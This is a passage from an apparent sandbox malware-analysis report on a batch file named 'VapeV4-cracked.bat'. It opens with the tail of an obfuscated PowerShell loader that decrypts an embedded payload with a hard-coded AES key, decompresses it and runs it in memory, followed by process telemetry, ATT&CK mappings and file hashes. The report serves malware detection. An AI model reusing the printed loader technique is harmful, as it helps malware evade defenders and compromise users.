'')($XRetW[0]);$VzjlJ = New-Object System.Security.Cryptography.AesManaged;$VzjlJ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$VzjlJ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$VzjlJ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9LYyQzQM9ObRTNtjjat6dGHCAmrnA9C39ag+PenTa5c=');$VzjlJ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QvFZR01UW2BYA8jIyDD/3A==');$TOsgU = $VzjlJ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYivz = $TOsgU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYivz, 0, $hYivz.Length);$TOsgU.Dispose();$VzjlJ.Dispose();$nVolF = New-Object System.IO.MemoryStream(, $hYivz);$VTMYb = New-Object System.IO.MemoryStream;$nmqaP = New-Object System.IO.Compression.GZipStream($nVolF, [IO.Compression.CompressionMode]::$WeCRB1);$nmqaP.$EGznT($VTMYb);$nmqaP.Dispose();$nVolF.Dispose();$VTMYb.Dispose();$hYivz = $VTMYb.ToArray();$iouAf = $GzAMm | IEX;$ewoEL = $iouAf::$WeCRB2($hYivz);$HogUs = $ewoEL.EntryPoint;$HogUs.$WeCRB0($null, (, [string[]] ($yAHNg)))
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:660

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3576

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3756

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3920

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3692

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:4780

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:4856

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:4880

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:1420

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:2792

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:3132

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:3000

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:2060

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4280

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1140

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3264

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3380

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:1468

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
PID:736

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:64

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:4556

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:1312

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
PID:3080

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
1⤵
PID:5052

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
ae54e9db2e89f2c54da8cc0bfcbd26bd

SHA1
a88af6c673609ecbc51a1a60dfbc8577830d2b5d

SHA256
5009d3c953de63cfd14a7d911156c514e179ff07d2b94382d9caac6040cb72af

SHA512
e3b70e5eb7321b9deca6f6a17424a15b9fd5c4008bd3789bd01099fd13cb2f4a2f37fe4b920fb51c50517745b576c1f94df83efd1a7e75949551163985599998

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
f53207a5ca2ef5c7e976cbb3cb26d870

SHA1
49a8cc44f53da77bb3dfb36fc7676ed54675db43

SHA256
19ab4e3c9da6d9cedda7461efdba9a2085e743513ab89f1dd0fd5a8f9486ad23

SHA512
be734c7e8afda19f445912aef0d78f9941add29baebd4a812bff27f10a1d78b52aeb11c551468c8644443c86e1a2a6b2e4aead3d7f81d39925e3c20406ac1499

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
Filesize
193B

MD5
62fc8758c85fb0d08cd24eeddafeda2c

SHA1
320fc202790b0ca6f65ff67e9397440c7d97eb20

SHA256
ee0d15dce841e092ad1a2d4346a612410f8f950fdb019bc7b768f6346f2b5248

SHA512
ca97e615bdcac137a936c10104a702e1529ed3470828f2c3a2f783345ebbef04cac8c051df636c714151671efea53a9b8912b6b0d0b5eafdac5fae1dfdc8f85d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
5KB

MD5
d90035855cfda1ec3a1c7665a5a169fb

SHA1
3eb1f37a6204668d3f574abd8c750c6aefd642af

SHA256
35be9e42bb0effd6ec5110feb14334756ad5b1957a998fc433aa94cb9b5ed3db

SHA512
eb764d01bb068601eaa322cff31c0ec90464af5eab534f87e4dd82da9fa98f68a3d69e6aeb2056617fc497ce87eaddd5ae35f52e4d19d51da8e4a93201c2f717

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB

MD5
7f9992777f9749ace9e61ce41dc9faf6

SHA1
20ba9254528b4093e43116f7e04cf3a3acdc23d8

SHA256
509c3193a54820abc2af2dad21150bf9d52211605a16a50281879b537215a7a2

SHA512
ab787ce0cc596fd6b320b6ca682f521b8309df0b65d8a875013bde5a6941901dbc5c3d44f569695f6a327932bdb9ac08ecd8c7ff0c7c1de53ccfcfc80ebb3796

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB

MD5
3db9e49de35dfabe0c88eb3dab2f26c3

SHA1
fc3881aadd66b5509ac768f6cd238a5733f747b4

SHA256
e940b7e45b20e4f6e04d5ddb36eb5bb12a730bc6aed822a1205fa589ae1adb97

SHA512
0ce277d5cde1306d72cddce2f10a69341c449ffee39d13017accd99b05a006fdeba90104a7a20cd113bfd40f7aa52aaeee45577caf40746590273a8e41f25633

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
Filesize
204B

MD5
1f0b47c49105c4436f23c2284187e5dd

SHA1
6fd906465ee30fdfbac328c9713334428209eec4

SHA256
0fedda05bd21adb1a60261c94a7891cb3f6a3492782b1a862245d39c4bf57170

SHA512
13bbafbf05b2f8ea3b82efa4021a7f85952ba4b85ac92c5c8c59f6341f2771cb556f86ee37ec7406e4d686763a1a8976472b755dea9e2810e857f08c1efb9002

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
Filesize
204B

MD5
3b184f9eda161f5dcfe00b7a5a261a03

SHA1
f32f8b780eeadc6b2fd1f0622fa18e4cd0e81ffa

SHA256
55f4aafb562e908bba90f00e4aaa825a078ece4d12de79d9fadbc4a5530601ac

SHA512
e5f22d7e3d67b6fcb6fd37ef2eb8069cfebc229c26ee4b0114c149dd6abc796a808d6b43e363ef378ad6a809a72b06fa5e9ad58920e9ff0f2cba60246c98a0c4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
10KB

MD5
c5d8a9120e307260840f85f229c279f1

SHA1
2a1c08aba1af08b5e927fd0c5eb88dd07e28496e

SHA256
ba8cdbf98c154fe5c842b953e407587171d6499e03f4f59a8457a3481a5b03db

SHA512
322a9ebed5f3fb59b252bbd0ac1fd562d0d66fb0e8d8b67e7a8c5db0543cf6d73254d05951b17455d2636cf03d281d4d8bdbae8fa1ad75c5514c34a62c6748f3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
10KB

MD5
6313bcbb337b706f59a7189a215d4c5b

SHA1
bfc7849e2d12789079ed134bbc93a47b3e8bebd3

SHA256
36005808b1db854ac4cc1920e202364865883bbd7d85bd882328eef764916863

SHA512
3f7050fa7e95f7231bea5edc6a3ede671c240a1d23215771db559dd96c171404aff5dd37bd98106f6eb2bfb8d07dfb7e761c54b063cb6072d9d4e2f813ef4c82

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xsa4j2t4.uc3.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Desktop\VapeV4-cracked.bat
Filesize
12.5MB

MD5
8913eca34d27762a5ec07b236f8a09b0

SHA1
0cfaa984f78b88c2a545a03af26f4b4fef1dd03e

SHA256
83be370335986f06373f4553cf5c3722a0a7ff1fd2874e9bf5170afbf133ec9d

SHA512
1b0a05494c64bafff3231a8f10c5ce7defca0a267585a94834dd5e511273ff1b0f38b35427752abd9dd2b24f56a8f9e78f6b9519cda7cc5603afdf0416e1412d

Download Submit
C:\Users\Admin\Desktop\VapeV4-cracked.bat.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\System32\ucrtbased.dll
Filesize
1.8MB

MD5
7873612dddd9152d70d892427bc45ef0

SHA1
ab9079a43a784471ca31c4f0a34b698d99334dfa

SHA256
203d10b0deaea87d5687d362ba925289a13e52b5df55b9de58ba534290af27bf

SHA512
d988e9ff11017465b019cf3b599ef7597d2c44fc37cbee9e846dee51990ca5dc45942cc183d9d25c1dfd84f33f922c2ceead6efc1ead19e8eecb509dfb78a083

Download Submit
C:\Windows\System32\vcruntime140_1d.dll
Filesize
52KB

MD5
9ef28981adcbf4360de5f11b8f4ecff9

SHA1
219aaa1a617b1dfa36f3928bd1020e410666134f

SHA256
8caaca1bfc909fcb972ceade7be7b80b5855a4621562ee32a10c9903b616d49a

SHA512
ef7f0b25fae749e6134269683f973fef37dfa1969fa4fa0567378ada073c36da4feb17b62d3282c443f4d3ba8b4aeb39063c607c848ade095880d981141adb9c

Download Submit
C:\Windows\System32\vcruntime140d.dll
Filesize
162KB

MD5
a366d6623c14c377c682d6b5451575e6

SHA1
a8894fcfb3aa06ad073b1f581b2e749b54827971

SHA256
7ed89c668d8ec04c1a0a73f35702b8e0d9819e13e6e7c51c4ac0e0abda6683e6

SHA512
cc7da40652209337d2122cafc903d3c11e31b5a37baf2247034e2f3e1de255e58d0e27fc134ce60a6812e6674fd8bc899f2b434dfc1160053f684cf220e6cb11

Download Submit
\??\pipe\LOCAL\crashpad_2308_WPKLYBYEMVESGBJU
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/336-257-0x00007FF822770000-0x00007FF822780000-memory.dmp

Filesize
64KB

Download
memory/336-256-0x0000021C8D720000-0x0000021C8D747000-memory.dmp

Filesize
156KB

Download
memory/532-283-0x00007FF822770000-0x00007FF822780000-memory.dmp

Filesize
64KB

Download
memory/532-282-0x000002314E770000-0x000002314E797000-memory.dmp

Filesize
156KB

Download
memory/612-245-0x0000014ADAC90000-0x0000014ADACB1000-memory.dmp

Filesize
132KB

Download
memory/612-247-0x0000014ADACC0000-0x0000014ADACE7000-memory.dmp

Filesize
156KB

Download
memory/612-248-0x00007FF822770000-0x00007FF822780000-memory.dmp

Filesize
64KB

Download
memory/632-232-0x00007FF8626F0000-0x00007FF8628E5000-memory.dmp

Filesize
2.0MB

Download
memory/632-233-0x00007FF8613B0000-0x00007FF86146E000-memory.dmp

Filesize
760KB

Download
memory/632-231-0x0000000140000000-0x0000000140028000-memory.dmp

Filesize
160KB

Download
memory/632-243-0x0000000140000000-0x0000000140028000-memory.dmp

Filesize
160KB

Download
memory/632-230-0x0000000140000000-0x0000000140028000-memory.dmp

Filesize
160KB

Download
memory/664-253-0x00007FF822770000-0x00007FF822780000-memory.dmp

Filesize
64KB

Download
memory/664-252-0x0000018561970000-0x0000018561997000-memory.dmp

Filesize
156KB

Download
memory/680-267-0x000001B40FA00000-0x000001B40FA27000-memory.dmp

Filesize
156KB

Download
memory/680-268-0x00007FF822770000-0x00007FF822780000-memory.dmp

Filesize
64KB

Download
memory/952-259-0x00000245C3040000-0x00000245C3067000-memory.dmp

Filesize
156KB

Download
memory/952-260-0x00007FF822770000-0x00007FF822780000-memory.dmp

Filesize
64KB

Download
memory/1084-271-0x00007FF822770000-0x00007FF822780000-memory.dmp

Filesize
64KB

Download
memory/1084-270-0x0000017FEA7B0000-0x0000017FEA7D7000-memory.dmp

Filesize
156KB

Download
memory/1096-274-0x00007FF822770000-0x00007FF822780000-memory.dmp

Filesize
64KB

Download
memory/1096-273-0x000001A3DE0F0000-0x000001A3DE117000-memory.dmp

Filesize
156KB

Download
memory/1148-276-0x000001CCB0630000-0x000001CCB0657000-memory.dmp

Filesize
156KB

Download
memory/1148-277-0x00007FF822770000-0x00007FF822780000-memory.dmp

Filesize
64KB

Download
memory/1184-280-0x00007FF822770000-0x00007FF822780000-memory.dmp

Filesize
64KB

Download
memory/1184-279-0x00000224A45D0000-0x00000224A45F7000-memory.dmp

Filesize
156KB

Download
memory/1204-166-0x000001EC82760000-0x000001EC82784000-memory.dmp

Filesize
144KB

Download
memory/1204-173-0x000001ECAD040000-0x000001ECAD098000-memory.dmp

Filesize
352KB

Download
memory/1204-153-0x00007FF8441B3000-0x00007FF8441B5000-memory.dmp

Filesize
8KB

Download
memory/1204-154-0x000001EC82870000-0x000001EC82892000-memory.dmp

Filesize
136KB

Download
memory/1204-164-0x00007FF8441B0000-0x00007FF844C71000-memory.dmp

Filesize
10.8MB

Download
memory/1204-165-0x00007FF8441B0000-0x00007FF844C71000-memory.dmp

Filesize
10.8MB

Download
memory/1204-168-0x00007FF8613B0000-0x00007FF86146E000-memory.dmp

Filesize
760KB

Download
memory/1204-167-0x00007FF8626F0000-0x00007FF8628E5000-memory.dmp

Filesize
2.0MB

Download
memory/1204-169-0x000001ECAB910000-0x000001ECAC9B0000-memory.dmp

Filesize
16.6MB

Download
memory/1204-171-0x000001ECACAB0000-0x000001ECACD9E000-memory.dmp

Filesize
2.9MB

Download
memory/1204-172-0x000001ECACDA0000-0x000001ECAD038000-memory.dmp

Filesize
2.6MB

Download
memory/1204-174-0x000001EC82790000-0x000001EC8279C000-memory.dmp

Filesize
48KB

Download
memory/1204-175-0x00007FF8626F0000-0x00007FF8628E5000-memory.dmp

Filesize
2.0MB

Download
memory/1292-287-0x0000022F78FD0000-0x0000022F78FF7000-memory.dmp

Filesize
156KB

Download
memory/1292-288-0x00007FF822770000-0x00007FF822780000-memory.dmp

Filesize
64KB

Download
memory/3416-214-0x000001B19CE00000-0x000001B19CE50000-memory.dmp

Filesize
320KB

Download
memory/3416-205-0x000001B19BAC0000-0x000001B19C280000-memory.dmp

Filesize
7.8MB

Download
memory/3416-228-0x00007FF8626F0000-0x00007FF8628E5000-memory.dmp

Filesize
2.0MB

Download
memory/3416-229-0x00007FF8613B0000-0x00007FF86146E000-memory.dmp

Filesize
760KB

Download
memory/3416-207-0x000001B19C6E0000-0x000001B19C792000-memory.dmp

Filesize
712KB

Download
memory/3416-204-0x000001B19B680000-0x000001B19BAC4000-memory.dmp

Filesize
4.3MB

Download
memory/3416-202-0x00007FF8626F0000-0x00007FF8628E5000-memory.dmp

Filesize
2.0MB

Download
memory/3416-206-0x000001B19C280000-0x000001B19C6DC000-memory.dmp

Filesize
4.4MB

Download
memory/3416-203-0x00007FF8613B0000-0x00007FF86146E000-memory.dmp

Filesize
760KB

Download
memory/3416-208-0x00007FF8626F0000-0x00007FF8628E5000-memory.dmp

Filesize
2.0MB

Download
memory/3416-215-0x000001B19CF10000-0x000001B19CFC2000-memory.dmp

Filesize
712KB

Download
memory/3416-227-0x000001B19CB70000-0x000001B19CB9E000-memory.dmp

Filesize
184KB

Download
memory/3416-216-0x000001B19D240000-0x000001B19D402000-memory.dmp

Filesize
1.8MB

Download
memory/3416-226-0x000001B19CDB0000-0x000001B19CDEC000-memory.dmp

Filesize
240KB

Download
memory/3792-177-0x0000000140000000-0x0000000140004000-memory.dmp

Filesize
16KB

Download
memory/3792-178-0x0000000140000000-0x0000000140004000-memory.dmp

Filesize
16KB

Download